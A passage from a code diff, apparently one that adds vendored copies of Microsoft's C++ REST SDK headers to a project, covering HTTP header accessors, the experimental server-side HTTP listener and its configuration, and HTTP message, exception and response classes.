content type of the body. + _ASYNCRTIMP utility::string_t content_type() const; + + /// + /// Sets the content type of the message. + /// + /// The content type of the body. + _ASYNCRTIMP void set_content_type(utility::string_t type); + + /// + /// Gets the cache control header of the message. + /// + /// The cache control header value. + _ASYNCRTIMP utility::string_t cache_control() const; + + /// + /// Sets the cache control header of the message. + /// + /// The cache control header value. + _ASYNCRTIMP void set_cache_control(utility::string_t control); + + /// + /// Gets the date header of the message. + /// + /// The date header value. + _ASYNCRTIMP utility::string_t date() const; + + /// + /// Sets the date header of the message. + /// + /// The date header value. + _ASYNCRTIMP void set_date(const utility::datetime& date); + +private: + // Headers are stored in a map with case insensitive key. + inner_container m_headers; +}; +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/http_listener.h b/Src/Common/CppRestSdk/include/cpprest/http_listener.h new file mode 100644 index 0000000..591ce17 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/http_listener.h @@ -0,0 +1,342 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: HTTP listener (server-side) APIs + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_HTTP_LISTENER_H +#define CASA_HTTP_LISTENER_H + +#include "Common/CppRestSdk/include/cpprest/http_msg.h" +#include +#include +#if !defined(_WIN32) && !defined(__cplusplus_winrt) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) +#include +#endif + +#if !defined(_WIN32) || (_WIN32_WINNT >= _WIN32_WINNT_VISTA && !defined(__cplusplus_winrt)) || \ + defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + +namespace web +{ +namespace http +{ +/// HTTP listener is currently in beta. +namespace experimental +{ +/// HTTP server side library. +namespace listener +{ +/// +/// Configuration class used to set various options when constructing and http_listener instance. +/// +class http_listener_config +{ +public: + /// + /// Create an http_listener configuration with default options. + /// + http_listener_config() : m_timeout(utility::seconds(120)), m_backlog(0) {} + + /// + /// Copy constructor. + /// + /// http_listener_config to copy. + http_listener_config(const http_listener_config& other) + : m_timeout(other.m_timeout) + , m_backlog(other.m_backlog) +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + , m_ssl_context_callback(other.m_ssl_context_callback) +#endif + { + } + + /// + /// Move constructor. + /// + /// http_listener_config to move from. + http_listener_config(http_listener_config&& other) + : m_timeout(std::move(other.m_timeout)) + , m_backlog(std::move(other.m_backlog)) +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + , m_ssl_context_callback(std::move(other.m_ssl_context_callback)) +#endif + { + } + + /// + /// Assignment operator. + /// + /// http_listener_config instance. + http_listener_config& operator=(const http_listener_config& rhs) + { + if (this != &rhs) + { + m_timeout = rhs.m_timeout; + m_backlog = rhs.m_backlog; +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + m_ssl_context_callback = rhs.m_ssl_context_callback; +#endif + } + return *this; + } + + /// + /// Assignment operator. + /// + /// http_listener_config instance. + http_listener_config& operator=(http_listener_config&& rhs) + { + if (this != &rhs) + { + m_timeout = std::move(rhs.m_timeout); + m_backlog = std::move(rhs.m_backlog); +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + m_ssl_context_callback = std::move(rhs.m_ssl_context_callback); +#endif + } + return *this; + } + + /// + /// Get the timeout + /// + /// The timeout (in seconds). + utility::seconds timeout() const { return m_timeout; } + + /// + /// Set the timeout + /// + /// The timeout (in seconds) used for each send and receive operation on the client. + void set_timeout(utility::seconds timeout) { m_timeout = std::move(timeout); } + + /// + /// Get the listen backlog + /// + /// The maximum length of the queue of pending connections, or zero for the implementation + /// default. The implementation may not honour this value. + int backlog() const { return m_backlog; } + + /// + /// Set the listen backlog + /// + /// The maximum length of the queue of pending connections, or zero for the implementation + /// default. The implementation may not honour this value. + void set_backlog(int backlog) { m_backlog = backlog; } + +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + /// + /// Get the callback of ssl context + /// + /// The function defined by the user of http_listener_config to configure a ssl context. + const std::function& get_ssl_context_callback() const + { + return m_ssl_context_callback; + } + + /// + /// Set the callback of ssl context + /// + /// The function to configure a ssl context which will setup https + /// connections. + void set_ssl_context_callback(const std::function& ssl_context_callback) + { + m_ssl_context_callback = ssl_context_callback; + } +#endif + +private: + utility::seconds m_timeout; + int m_backlog; +#if !defined(_WIN32) || defined(CPPREST_FORCE_HTTP_LISTENER_ASIO) + std::function m_ssl_context_callback; +#endif +}; + +namespace details +{ +/// +/// Internal class for pointer to implementation design pattern. +/// +class http_listener_impl +{ +public: + http_listener_impl() : m_closed(true), m_close_task(pplx::task_from_result()) {} + + _ASYNCRTIMP http_listener_impl(http::uri address); + _ASYNCRTIMP http_listener_impl(http::uri address, http_listener_config config); + + _ASYNCRTIMP pplx::task open(); + _ASYNCRTIMP pplx::task close(); + + /// + /// Handler for all requests. The HTTP host uses this to dispatch a message to the pipeline. + /// + /// Only HTTP server implementations should call this API. + _ASYNCRTIMP void handle_request(http::http_request msg); + + const http::uri& uri() const { return m_uri; } + + const http_listener_config& configuration() const { return m_config; } + + // Handlers + std::function m_all_requests; + std::map> m_supported_methods; + +private: + // Default implementation for TRACE and OPTIONS. + void handle_trace(http::http_request message); + void handle_options(http::http_request message); + + // Gets a comma separated string containing the methods supported by this listener. + utility::string_t get_supported_methods() const; + + http::uri m_uri; + http_listener_config m_config; + + // Used to record that the listener is closed. + bool m_closed; + pplx::task m_close_task; +}; + +} // namespace details + +/// +/// A class for listening and processing HTTP requests at a specific URI. +/// +class http_listener +{ +public: + /// + /// Create a listener from a URI. + /// + /// The listener will not have been opened when returned. + /// URI at which the listener should accept requests. + http_listener(http::uri address) + : m_impl(utility::details::make_unique(std::move(address))) + { + } + + /// + /// Create a listener with specified URI and configuration. + /// + /// URI at which the listener should accept requests. + /// Configuration to create listener with. + http_listener(http::uri address, http_listener_config config) + : m_impl(utility::details::make_unique(std::move(address), std::move(config))) + { + } + + /// + /// Default constructor. + /// + /// The resulting listener cannot be used for anything, but is useful to initialize a variable + /// that will later be overwritten with a real listener instance. + http_listener() : m_impl(utility::details::make_unique()) {} + + /// + /// Destructor frees any held resources. + /// + /// Call close() before allowing a listener to be destroyed. + ~http_listener() + { + if (m_impl) + { + // As a safe guard close the listener if not already done. + // Users are required to call close, but this is just a safeguard. + try + { + m_impl->close().wait(); + } + catch (...) + { + } + } + } + + /// + /// Asynchronously open the listener, i.e. start accepting requests. + /// + /// A task that will be completed once this listener is actually opened, accepting requests. + pplx::task open() { return m_impl->open(); } + + /// + /// Asynchronously stop accepting requests and close all connections. + /// + /// A task that will be completed once this listener is actually closed, no longer accepting + /// requests. This function will stop accepting requests and wait for all outstanding handler + /// calls to finish before completing the task. Waiting on the task returned from close() within a handler and + /// blocking waiting for its result will result in a deadlock. + /// + /// Call close() before allowing a listener to be destroyed. + /// + pplx::task close() { return m_impl->close(); } + + /// + /// Add a general handler to support all requests. + /// + /// Function object to be called for all requests. + void support(const std::function& handler) { m_impl->m_all_requests = handler; } + + /// + /// Add support for a specific HTTP method. + /// + /// An HTTP method. + /// Function object to be called for all requests for the given HTTP method. + void support(const http::method& method, const std::function& handler) + { + m_impl->m_supported_methods[method] = handler; + } + + /// + /// Get the URI of the listener. + /// + /// The URI this listener is for. + const http::uri& uri() const { return m_impl->uri(); } + + /// + /// Get the configuration of this listener. + /// + /// Configuration this listener was constructed with. + const http_listener_config& configuration() const { return m_impl->configuration(); } + + /// + /// Move constructor. + /// + /// http_listener instance to construct this one from. + http_listener(http_listener&& other) : m_impl(std::move(other.m_impl)) {} + + /// + /// Move assignment operator. + /// + /// http_listener to replace this one with. + http_listener& operator=(http_listener&& other) + { + if (this != &other) + { + m_impl = std::move(other.m_impl); + } + return *this; + } + +private: + // No copying of listeners. + http_listener(const http_listener& other); + http_listener& operator=(const http_listener& other); + + std::unique_ptr m_impl; +}; + +} // namespace listener +} // namespace experimental +} // namespace http +} // namespace web + +#endif +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/http_msg.h b/Src/Common/CppRestSdk/include/cpprest/http_msg.h new file mode 100644 index 0000000..021d58a --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/http_msg.h @@ -0,0 +1,1632 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: Request and reply message definitions. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/containerstream.h" +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" +#include "Common/CppRestSdk/include/cpprest/http_compression.h" +#include "Common/CppRestSdk/include/cpprest/http_headers.h" +#include "Common/CppRestSdk/include/cpprest/json.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include "Common/CppRestSdk/include/cpprest/uri.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include +#include + +namespace web +{ +namespace http +{ +// URI class has been moved from web::http namespace to web namespace. +// The below using declarations ensure we don't break existing code. +// Please use the web::uri class going forward. +using web::uri; +using web::uri_builder; + +namespace client +{ +class http_client; +} + +/// +/// Represents the HTTP protocol version of a message, as {major, minor}. +/// +struct http_version +{ + uint8_t major; + uint8_t minor; + + inline bool operator==(const http_version& other) const { return major == other.major && minor == other.minor; } + inline bool operator<(const http_version& other) const + { + return major < other.major || (major == other.major && minor < other.minor); + } + + inline bool operator!=(const http_version& other) const { return !(*this == other); } + inline bool operator>=(const http_version& other) const { return !(*this < other); } + inline bool operator>(const http_version& other) const { return !(*this < other || *this == other); } + inline bool operator<=(const http_version& other) const { return *this < other || *this == other; } + + /// + /// Creates http_version from an HTTP-Version string, "HTTP" "/" 1*DIGIT "." 1*DIGIT. + /// + /// Returns a http_version of {0, 0} if not successful. + static _ASYNCRTIMP http_version __cdecl from_string(const std::string& http_version_string); + + /// + /// Returns the string representation of the http_version. + /// + _ASYNCRTIMP std::string to_utf8string() const; +}; + +/// +/// Predefined HTTP protocol versions. +/// +class http_versions +{ +public: + _ASYNCRTIMP static const http_version HTTP_0_9; + _ASYNCRTIMP static const http_version HTTP_1_0; + _ASYNCRTIMP static const http_version HTTP_1_1; +}; + +/// +/// Predefined method strings for the standard HTTP methods mentioned in the +/// HTTP 1.1 specification. +/// +typedef utility::string_t method; + +/// +/// Common HTTP methods. +/// +class methods +{ +public: +#define _METHODS +#define DAT(a, b) _ASYNCRTIMP const static method a; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _METHODS +#undef DAT +}; + +typedef unsigned short status_code; + +/// +/// Predefined values for all of the standard HTTP 1.1 response status codes. +/// +class status_codes +{ +public: +#define _PHRASES +#define DAT(a, b, c) const static status_code a = b; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _PHRASES +#undef DAT +}; + +namespace details +{ +/// +/// Constants for MIME types. +/// +class mime_types +{ +public: +#define _MIME_TYPES +#define DAT(a, b) _ASYNCRTIMP const static utility::string_t a; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _MIME_TYPES +#undef DAT +}; + +/// +/// Constants for charset types. +/// +class charset_types +{ +public: +#define _CHARSET_TYPES +#define DAT(a, b) _ASYNCRTIMP const static utility::string_t a; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _CHARSET_TYPES +#undef DAT +}; + +} // namespace details + +/// Message direction +namespace message_direction +{ +/// +/// Enumeration used to denote the direction of a message: a request with a body is +/// an upload, a response with a body is a download. +/// +enum direction +{ + upload, + download +}; +} // namespace message_direction + +typedef utility::string_t reason_phrase; +typedef std::function progress_handler; + +struct http_status_to_phrase +{ + unsigned short id; + reason_phrase phrase; +}; + +/// +/// Constants for the HTTP headers mentioned in RFC 2616. +/// +class header_names +{ +public: +#define _HEADER_NAMES +#define DAT(a, b) _ASYNCRTIMP const static utility::string_t a; +#include "Common/CppRestSdk/include/cpprest/details/http_constants.dat" +#undef _HEADER_NAMES +#undef DAT +}; + +/// +/// Represents an HTTP error. This class holds an error message and an optional error code. +/// +class http_exception : public std::exception +{ +public: + /// + /// Creates an http_exception with just a string message and no error code. + /// + /// Error message string. + http_exception(const utility::string_t& whatArg) : m_msg(utility::conversions::to_utf8string(whatArg)) {} + +#ifdef _WIN32 + /// + /// Creates an http_exception with just a string message and no error code. + /// + /// Error message string. + http_exception(std::string whatArg) : m_msg(std::move(whatArg)) {} +#endif + + /// + /// Creates an http_exception with from a error code using the current platform error category. + /// The message of the error code will be used as the what() string message. + /// + /// Error code value. + http_exception(int errorCode) : m_errorCode(utility::details::create_error_code(errorCode)) + { + m_msg = m_errorCode.message(); + } + + /// + /// Creates an http_exception with from a error code using the current platform error category. + /// + /// Error code value. + /// Message to use in what() string. + http_exception(int errorCode, const utility::string_t& whatArg) + : m_errorCode(utility::details::create_error_code(errorCode)) + , m_msg(utility::conversions::to_utf8string(whatArg)) + { + } + +#ifdef _WIN32 + /// + /// Creates an http_exception with from a error code using the current platform error category. + /// + /// Error code value. + /// Message to use in what() string. + http_exception(int errorCode, std::string whatArg) + : m_errorCode(utility::details::create_error_code(errorCode)), m_msg(std::move(whatArg)) + { + } +#endif + + /// + /// Creates an http_exception with from a error code and category. The message of the error code will be used + /// as the what string message. + /// + /// Error code value. + /// Error category for the code. + http_exception(int errorCode, const std::error_category& cat) : m_errorCode(std::error_code(errorCode, cat)) + { + m_msg = m_errorCode.message(); + } + + /// + /// Creates an http_exception with from a error code with a category, and a string message. + /// + /// Error code value. + /// Error message string. + http_exception(std::error_code errorCode, const utility::string_t& whatArg) + : m_errorCode(std::move(errorCode)), m_msg(utility::conversions::to_utf8string(whatArg)) + { + } + +#ifdef _WIN32 + /// + /// Creates an http_exception with from a error code with a category, and a string message. + /// + /// Error code value. + /// Error message string. + http_exception(std::error_code errorCode, std::string whatArg) + : m_errorCode(std::move(errorCode)), m_msg(std::move(whatArg)) + { + } +#endif + + /// + /// Gets a string identifying the cause of the exception. + /// + /// A null terminated character string. + const char* what() const CPPREST_NOEXCEPT { return m_msg.c_str(); } + + /// + /// Retrieves the underlying error code causing this exception. + /// + /// A std::error_code. + const std::error_code& error_code() const { return m_errorCode; } + +private: + std::error_code m_errorCode; + std::string m_msg; +}; + +namespace details +{ +/// +/// Base class for HTTP messages. +/// This class is to store common functionality so it isn't duplicated on +/// both the request and response side. +/// +class http_msg_base +{ +public: + friend class http::client::http_client; + + _ASYNCRTIMP http_msg_base(); + + virtual ~http_msg_base() {} + + http::http_version http_version() const { return m_http_version; } + + http_headers& headers() { return m_headers; } + + _ASYNCRTIMP void set_body(const concurrency::streams::istream& instream, const utf8string& contentType); + _ASYNCRTIMP void set_body(const concurrency::streams::istream& instream, const utf16string& contentType); + _ASYNCRTIMP void set_body(const concurrency::streams::istream& instream, + utility::size64_t contentLength, + const utf8string& contentType); + _ASYNCRTIMP void set_body(const concurrency::streams::istream& instream, + utility::size64_t contentLength, + const utf16string& contentType); + + /// + /// Helper function for extract functions. Parses the Content-Type header and check to make sure it matches, + /// throws an exception if not. + /// + /// If true ignores the Content-Type header value. + /// Function to verify additional information on Content-Type. + /// A string containing the charset, an empty string if no Content-Type header is empty. + utility::string_t parse_and_check_content_type( + bool ignore_content_type, const std::function& check_content_type); + + _ASYNCRTIMP utf8string extract_utf8string(bool ignore_content_type = false); + _ASYNCRTIMP utf16string extract_utf16string(bool ignore_content_type = false); + _ASYNCRTIMP utility::string_t extract_string(bool ignore_content_type = false); + + _ASYNCRTIMP json::value _extract_json(bool ignore_content_type = false); + _ASYNCRTIMP std::vector _extract_vector(); + + virtual _ASYNCRTIMP utility::string_t to_string() const; + + /// + /// Completes this message + /// + virtual _ASYNCRTIMP void _complete(utility::size64_t bodySize, + const std::exception_ptr& exceptionPtr = std::exception_ptr()); + + /// + /// Set the stream through which the message body could be read + /// + void set_instream(const concurrency::streams::istream& instream) { m_inStream = instream; } + + /// + /// Get the stream through which the message body could be read + /// + const concurrency::streams::istream& instream() const { return m_inStream; } + + /// + /// Set the stream through which the message body could be written + /// + void set_outstream(const concurrency::streams::ostream& outstream, bool is_default) + { + m_outStream = outstream; + m_default_outstream = is_default; + } + + /// + /// Get the stream through which the message body could be written + /// + const concurrency::streams::ostream& outstream() const { return m_outStream; } + + /// + /// Sets the compressor for the message body + /// + void set_compressor(std::unique_ptr compressor) + { + m_compressor = std::move(compressor); + } + + /// + /// Gets the compressor for the message body, if any + /// + std::unique_ptr& compressor() { return m_compressor; } + + /// + /// Sets the collection of factory classes for decompressors for use with the message body + /// + void set_decompress_factories(const std::vector>& factories) + { + m_decompressors = factories; + } + + /// + /// Gets the collection of factory classes for decompressors to be used to decompress the message body, if any + /// + const std::vector>& decompress_factories() + { + return m_decompressors; + } + + const pplx::task_completion_event& _get_data_available() const { return m_data_available; } + + /// + /// Prepare the message with an output stream to receive network data + /// + _ASYNCRTIMP void _prepare_to_receive_data(); + + /// + /// Determine the remaining input stream length + /// + /// + /// std::numeric_limits::max() if the stream's remaining length cannot be determined + /// length if the stream's remaining length (which may be 0) can be determined + /// + /// + /// This routine should only be called after a msg (request/response) has been + /// completely constructed. + /// + _ASYNCRTIMP size_t _get_stream_length(); + + /// + /// Determine the content length + /// + /// + /// std::numeric_limits::max() if there is content with unknown length (transfer_encoding:chunked) + /// 0 if there is no content + /// length if there is content with known length + /// + /// + /// This routine should only be called after a msg (request/response) has been + /// completely constructed. + /// + _ASYNCRTIMP size_t _get_content_length(); + + /// + /// Determine the content length, and, if necessary, manage compression in the Transfer-Encoding header + /// + /// + /// std::numeric_limits::max() if there is content with unknown length (transfer_encoding:chunked) + /// 0 if there is no content + /// length if there is content with known length + /// + /// + /// This routine is like _get_content_length, except that it adds a compression algorithm to + /// the Trasfer-Length header if compression is configured. It throws if a Transfer-Encoding + /// header exists and does not match the one it generated. + /// + _ASYNCRTIMP size_t _get_content_length_and_set_compression(); + + void _set_http_version(const http::http_version& http_version) { m_http_version = http_version; } + +protected: + std::unique_ptr m_compressor; + std::unique_ptr m_decompressor; + std::vector> m_decompressors; + + /// + /// Stream to read the message body. + /// By default this is an invalid stream. The user could set the instream on + /// a request by calling set_request_stream(...). This would also be set when + /// set_body() is called - a stream from the body is constructed and set. + /// Even in the presence of msg body this stream could be invalid. An example + /// would be when the user sets an ostream for the response. With that API the + /// user does not provide the ability to read the msg body. + /// Thus m_instream is valid when there is a msg body and it can actually be read + /// + concurrency::streams::istream m_inStream; + + /// + /// stream to write the msg body + /// By default this is an invalid stream. The user could set this on the response + /// (for http_client). In all the other cases we would construct one to transfer + /// the data from the network into the message body. + /// + concurrency::streams::ostream m_outStream; + + http::http_version m_http_version; + http_headers m_headers; + bool m_default_outstream; + + /// The TCE is used to signal the availability of the message body. + pplx::task_completion_event m_data_available; + + size_t _get_content_length(bool honor_compression); +}; + +/// +/// Base structure for associating internal server information +/// with an HTTP request/response. +/// +class _http_server_context +{ +public: + _http_server_context() {} + virtual ~_http_server_context() {} + +private: +}; + +/// +/// Internal representation of an HTTP response. +/// +class _http_response final : public http::details::http_msg_base +{ +public: + _http_response() : m_status_code((std::numeric_limits::max)()) {} + + _http_response(http::status_code code) : m_status_code(code) {} + + http::status_code status_code() const { return m_status_code; } + + void set_status_code(http::status_code code) { m_status_code = code; } + + const http::reason_phrase& reason_phrase() const { return m_reason_phrase; } + + void set_reason_phrase(const http::reason_phrase& reason) { m_reason_phrase = reason; } + + _ASYNCRTIMP utility::string_t to_string() const; + + _http_server_context* _get_server_context() const { return m_server_context.get(); } + + void _set_server_context(std::unique_ptr server_context) + { + m_server_context = std::move(server_context); + } + +private: + std::unique_ptr<_http_server_context> m_server_context; + + http::status_code m_status_code; + http::reason_phrase m_reason_phrase; +}; + +} // namespace details + +/// +/// Represents an HTTP response. +/// +class http_response +{ +public: + /// + /// Constructs a response with an empty status code, no headers, and no body. + /// + /// A new HTTP response. + http_response() : _m_impl(std::make_shared()) {} + + /// + /// Constructs a response with given status code, no headers, and no body. + /// + /// HTTP status code to use in response. + /// A new HTTP response. + http_response(http::status_code code) : _m_impl(std::make_shared(code)) {} + + /// + /// Gets the status code of the response message. + /// + /// status code. + http::status_code status_code() const { return _m_impl->status_code(); } + + /// + /// Sets the status code of the response message. + /// + /// Status code to set. + /// + /// This will overwrite any previously set status code. + /// + void set_status_code(http::status_code code) const { _m_impl->set_status_code(code); } + + /// + /// Gets the reason phrase of the response message. + /// If no reason phrase is set it will default to the standard one corresponding to the status code. + /// + /// Reason phrase. + const http::reason_phrase& reason_phrase() const { return _m_impl->reason_phrase(); } + + /// + /// Sets the reason phrase of the response message. + /// If no reason phrase is set it will default to the standard one corresponding to the status code. + /// + /// The reason phrase to set. + void set_reason_phrase(const http::reason_phrase& reason) const { _m_impl->set_reason_phrase(reason); } + + /// + /// Gets the headers of the response message. + /// + /// HTTP headers for this response. + /// + /// Use the to fill in desired headers. + /// + http_headers& headers() { return _m_impl->headers(); } + + /// + /// Gets a const reference to the headers of the response message. + /// + /// HTTP headers for this response. + const http_headers& headers() const { return _m_impl->headers(); } + + /// + /// Generates a string representation of the message, including the body when possible. + /// Mainly this should be used for debugging purposes as it has to copy the + /// message body and doesn't have excellent performance. + /// + /// A string representation of this HTTP request. + /// Note this function is synchronous and doesn't wait for the + /// entire message body to arrive. If the message body has arrived by the time this + /// function is called and it is has a textual Content-Type it will be included. + /// Otherwise just the headers will be present. + utility::string_t to_string() const { return _m_impl->to_string(); } + + /// + /// Extracts the body of the response message as a string value, checking that the content type is a MIME text type. + /// A body can only be extracted once because in some cases an optimization is made where the data is 'moved' out. + /// + /// If true, ignores the Content-Type header and assumes text. + /// String containing body of the message. + pplx::task extract_string(bool ignore_content_type = false) const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_string(ignore_content_type); + }); + } + + /// + /// Extracts the body of the response message as a UTF-8 string value, checking that the content type is a MIME text + /// type. A body can only be extracted once because in some cases an optimization is made where the data is 'moved' + /// out. + /// + /// If true, ignores the Content-Type header and assumes text. + /// String containing body of the message. + pplx::task extract_utf8string(bool ignore_content_type = false) const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_utf8string(ignore_content_type); + }); + } + + /// + /// Extracts the body of the response message as a UTF-16 string value, checking that the content type is a MIME + /// text type. A body can only be extracted once because in some cases an optimization is made where the data is + /// 'moved' out. + /// + /// If true, ignores the Content-Type header and assumes text. + /// String containing body of the message. + pplx::task extract_utf16string(bool ignore_content_type = false) const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_utf16string(ignore_content_type); + }); + } + + /// + /// Extracts the body of the response message into a json value, checking that the content type is application/json. + /// A body can only be extracted once because in some cases an optimization is made where the data is 'moved' out. + /// + /// If true, ignores the Content-Type header and assumes json. + /// JSON value from the body of this message. + pplx::task extract_json(bool ignore_content_type = false) const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->_extract_json(ignore_content_type); + }); + } + + /// + /// Extracts the body of the response message into a vector of bytes. + /// + /// The body of the message as a vector of bytes. + pplx::task> extract_vector() const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl](utility::size64_t) { + return impl->_extract_vector(); + }); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-8. + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain; + /// charset=utf-8". This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(utf8string&& body_text, const utf8string& content_type = utf8string("text/plain; charset=utf-8")) + { + const auto length = body_text.size(); + _m_impl->set_body( + concurrency::streams::bytestream::open_istream(std::move(body_text)), length, content_type); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-8. + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain; + /// charset=utf-8". This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(const utf8string& body_text, const utf8string& content_type = utf8string("text/plain; charset=utf-8")) + { + _m_impl->set_body( + concurrency::streams::bytestream::open_istream(body_text), body_text.size(), content_type); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-16 will perform conversion to UTF-8. + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain". + /// + /// This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(const utf16string& body_text, + utf16string content_type = utility::conversions::to_utf16string("text/plain")) + { + if (content_type.find(::utility::conversions::to_utf16string("charset=")) != content_type.npos) + { + throw std::invalid_argument("content_type can't contain a 'charset'."); + } + + auto utf8body = utility::conversions::utf16_to_utf8(body_text); + auto length = utf8body.size(); + _m_impl->set_body(concurrency::streams::bytestream::open_istream(std::move(utf8body)), + length, + std::move(content_type.append(::utility::conversions::to_utf16string("; charset=utf-8")))); + } + + /// + /// Sets the body of the message to contain json value. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/json'. + /// + /// json value. + /// + /// This will overwrite any previously set body data. + /// + void set_body(const json::value& body_data) + { + auto body_text = utility::conversions::to_utf8string(body_data.serialize()); + auto length = body_text.size(); + set_body(concurrency::streams::bytestream::open_istream(std::move(body_text)), + length, + _XPLATSTR("application/json")); + } + + /// + /// Sets the body of the message to the contents of a byte vector. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/octet-stream'. + /// + /// Vector containing body data. + /// + /// This will overwrite any previously set body data. + /// + void set_body(std::vector&& body_data) + { + auto length = body_data.size(); + set_body(concurrency::streams::bytestream::open_istream(std::move(body_data)), length); + } + + /// + /// Sets the body of the message to the contents of a byte vector. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/octet-stream'. + /// + /// Vector containing body data. + /// + /// This will overwrite any previously set body data. + /// + void set_body(const std::vector& body_data) + { + set_body(concurrency::streams::bytestream::open_istream(body_data), body_data.size()); + } + + /// + /// Defines a stream that will be relied on to provide the body of the HTTP message when it is + /// sent. + /// + /// A readable, open asynchronous stream. + /// A string holding the MIME type of the message body. + /// + /// This cannot be used in conjunction with any external means of setting the body of the request. + /// The stream will not be read until the message is sent. + /// + void set_body(const concurrency::streams::istream& stream, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) + { + _m_impl->set_body(stream, content_type); + } + + /// + /// Defines a stream that will be relied on to provide the body of the HTTP message when it is + /// sent. + /// + /// A readable, open asynchronous stream. + /// The size of the data to be sent in the body. + /// A string holding the MIME type of the message body. + /// + /// This cannot be used in conjunction with any external means of setting the body of the request. + /// The stream will not be read until the message is sent. + /// + void set_body(const concurrency::streams::istream& stream, + utility::size64_t content_length, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) + { + _m_impl->set_body(stream, content_length, content_type); + } + + /// + /// Produces a stream which the caller may use to retrieve data from an incoming request. + /// + /// A readable, open asynchronous stream. + /// + /// This cannot be used in conjunction with any other means of getting the body of the request. + /// It is not necessary to wait until the message has been sent before starting to write to the + /// stream, but it is advisable to do so, since it will allow the network I/O to start earlier + /// and the work of sending data can be overlapped with the production of more data. + /// + concurrency::streams::istream body() const { return _m_impl->instream(); } + + /// + /// Signals the user (client) when all the data for this response message has been received. + /// + /// A task which is completed when all of the response body has been received. + pplx::task content_ready() const + { + http_response resp = *this; + return pplx::create_task(_m_impl->_get_data_available()).then([resp](utility::size64_t) mutable { + return resp; + }); + } + + std::shared_ptr _get_impl() const { return _m_impl; } + + http::details::_http_server_context* _get_server_context() const { return _m_impl->_get_server_context(); } + void _set_server_context(std::unique_ptr server_context) + { + _m_impl->_set_server_context(std::move(server_context)); + } + +private: + std::shared_ptr _m_impl; +}; + +namespace details +{ +/// +/// Internal representation of an HTTP request message. +/// +class _http_request final : public http::details::http_msg_base, public std::enable_shared_from_this<_http_request> +{ +public: + _ASYNCRTIMP _http_request(http::method mtd); + + _ASYNCRTIMP _http_request(std::unique_ptr server_context); + + virtual ~_http_request() {} + + http::method& method() { return m_method; } + + uri& request_uri() { return m_uri; } + + _ASYNCRTIMP uri absolute_uri() const; + + _ASYNCRTIMP uri relative_uri() const; + + _ASYNCRTIMP void set_request_uri(const uri&); + + const utility::string_t& remote_address() const { return m_remote_address; } + + const pplx::cancellation_token& cancellation_token() const { return m_cancellationToken; } + + void set_cancellation_token(const pplx::cancellation_token& token) { m_cancellationToken = token; } + + _ASYNCRTIMP utility::string_t to_string() const; + + _ASYNCRTIMP pplx::task reply(const http_response& 